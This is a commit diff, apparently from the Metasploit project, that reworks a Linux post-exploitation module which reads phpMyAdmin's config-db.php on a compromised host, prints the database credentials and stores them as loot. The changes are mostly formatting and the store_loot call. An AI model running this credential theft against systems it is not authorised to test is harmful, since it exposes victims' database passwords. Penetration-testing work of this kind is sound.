Updating store_loot?

2018-08-20 16:57:09 +05:30 · 2018-08-20 16:57:09 +05:30 · 107baee0a2
parent a018d24df4
commit 107baee0a2
1 changed files with 24 additions and 23 deletions
--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@ -4,27 +4,29 @@
 ##

 class MetasploitModule < Msf::Post
+
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info={})
    super(update_info(info,
-      'Name'                 => "PhpMyAdmin credentials stealer",
-      'Description'          => %q{
+      'Name'         => "PhpMyAdmin credentials stealer",
+      'Description'  => %q{
        This module gathers PhpMyAdmin Creds from Target Linux machine.
      },
-      'License'              => MSF_LICENSE,
-      'Platform'             => ['linux'],
-      'Privileged'     => 'true', #This requires root privileges
-      'SessionTypes'         => ['meterpreter'],
-      'Arch'       => 'x86_x64',
-      'References'            =>
+      'License'      => MSF_LICENSE,
+      'Platform'     => ['linux'],
+      'SessionTypes' => ['meterpreter'],
+      'Arch'         => 'x86_x64',
+      'Privileged'   => 'true',
+      'References'   =>
        [
          [ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
+
        ],
      'Author'               => [
-        'bofheaded',
+        'Chaitanya Haritash [bofheaded]',
        'Dhiraj Mishra <dhiraj@notsosecure.com>'
        ]
    ))
@ -36,7 +38,10 @@ class MetasploitModule < Msf::Post
   end

  def run
-    print_line('PhpMyAdmin Creds Stealer')
+
+    sess = client
+    print_line("\nPhpMyAdmin Creds Stealer!\n")
+    cred_dump = ""

    if session.platform.include?("windows")
      print_error("This Module is not Compatible with Windows")
@ -44,23 +49,19 @@ class MetasploitModule < Msf::Post
    end

    conf_path= "/etc/phpmyadmin/config-db.php"
-    unless file_exist?(conf_path)
-      vprint_error("#{conf_path} doesn't exist on target")
+    if file_exist?(conf_path) == false
+      print_error("#{conf_path} doesn't exist on target")
      return
    end

    print_good('PhpMyAdmin config found!')
-    print_good("Extracting config file!\n")
+    print_good("Extracting Creds")
    res = read_file(conf_path)
-    print_line res
-    vprint_good("#{peer} - #{res.body}")
-    path = store_loot(
-      'phpmyadmin.credsteal',
-      'text/plain',
-      ip,
-      res.body,
-      filename
-    )
-    print_good("File saved in: #{path}")
+
+    cred_dump << res
+    store_loot("phpmyadmin_conf","text/plain",sess,cred_dump,"phpmyadmin_conf.txt","phpmyadmin_conf")
+    print_good("Storing dump in ~/.msf4/loot/")
+    print_status("Extracted Creds ::\n")
+    print_line(res)
  end
 end